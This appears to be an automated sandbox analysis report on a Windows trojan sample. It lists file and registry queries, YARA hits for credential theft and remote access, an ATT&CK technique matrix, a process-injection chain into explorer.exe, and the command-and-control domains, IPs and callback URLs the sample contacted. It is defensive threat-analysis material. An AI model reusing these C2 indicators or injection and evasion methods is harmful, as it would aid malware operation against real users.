          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix (one line per tactic column; the number in parentheses is the counter shown next to that technique in the original matrix, techniques without a number carried none):

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Shared Modules (1), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (612), Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (31), Process Injection (612), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (4), Software Packing (13), File Deletion (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Security Software Discovery (221), Process Discovery (2), Virtualization/Sandbox Evasion (31), Remote System Discovery (1), System Information Discovery (112), System Owner/User Discovery, Network Sniffing, Network Service Scanning
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (13), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Generate Fraudulent Advertising Revenue
Impact: Modify System Partition, Device Lockout, Delete Device Data, Data Encrypted for Impact
Behavior Graph (ID: 562399, Sample: GV8EJooYMIgEnEk.exe, Startdate: 28/01/2022, Architecture: WINDOWS, Score: 100)

Start: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
GV8EJooYMIgEnEk.exe (started): dropped C:\Users\user\...\GV8EJooYMIgEnEk.exe.log (ASCII); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
  -> GV8EJooYMIgEnEk.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    -> explorer.exe (injected): www.experiencedlawfirms.com 166.88.62.202, 49816, 80 EGIHOSTINGUS United States; www.totalwinerewards.com 199.59.243.200, 49817, 80 BODIS-NJUS United States; 8 other IPs or domains; System process connects to network (likely due to code injection or exploit)
      -> chkdsk.exe (started): Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        -> cmd.exe (started)
          -> conhost.exe (started)

Source | Detection | Scanner | Label
GV8EJooYMIgEnEk.exe | 61% | Virustotal |
GV8EJooYMIgEnEk.exe | 21% | Metadefender |
GV8EJooYMIgEnEk.exe | 63% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
GV8EJooYMIgEnEk.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
Source | Detection | Scanner | Label
3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
Source | Detection | Scanner | Label
http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 | 0% | Avira URL Cloud | safe
http://schemas.mi | 0% | URL Reputation | safe
http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://schemas.micr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
www.cottoneworld.com/cbgo/ | 100% | Avira URL Cloud | malware
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
https://parking.bodiscdn.com | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf | 100% | Avira URL Cloud | malware
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.bitconga.com | 18.231.72.25 | true | true | | unknown
webarate.com | 46.252.151.235 | true | true | | unknown
omnipets.store | 34.102.136.180 | true | false | | unknown
www.totalwinerewards.com | 199.59.243.200 | true | true | | unknown
www.experiencedlawfirms.com | 166.88.62.202 | true | true | | unknown
casatowerofficial.com | 34.102.136.180 | true | false | | unknown
www.casatowerofficial.com | unknown | unknown | true | | unknown
www.webarate.com | unknown | unknown | true | | unknown
www.tothelaundry.com | unknown | unknown | true | | unknown
www.omnipets.store | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.omnipets.store/cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 | false | Avira URL Cloud: safe | unknown
http://www.totalwinerewards.com/cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 | true | Avira URL Cloud: safe | unknown
www.cottoneworld.com/cbgo/ | true | Avira URL Cloud: malware | low
http://www.casatowerofficial.com/cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf | false | Avira URL Cloud: malware | unknown
http://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.mi | explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micr | explorer.exe, 00000005.00000000.375783140.00000000089CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356516415.00000000089CC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://parking.bodiscdn.com | chkdsk.exe, 0000000A.00000002.567570412.0000000005412000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.deDPlease | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | GV8EJooYMIgEnEk.exe, 00000000.00000002.348586160.0000000006982000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
46.252.151.235 | webarate.com | Italy | 60087 | ASSUPERNOVAIT | true
166.88.62.202 | www.experiencedlawfirms.com | United States | 18779 | EGIHOSTINGUS | true
18.231.72.25 | www.bitconga.com | United States | 16509 | AMAZON-02US | true
34.102.136.180 | omnipets.store | United States | 15169 | GOOGLEUS | false
199.59.243.200 | www.totalwinerewards.com | United States | 395082 | BODIS-NJUS | true
Joe Sandbox Version: 34.0.0 Boulder Opal
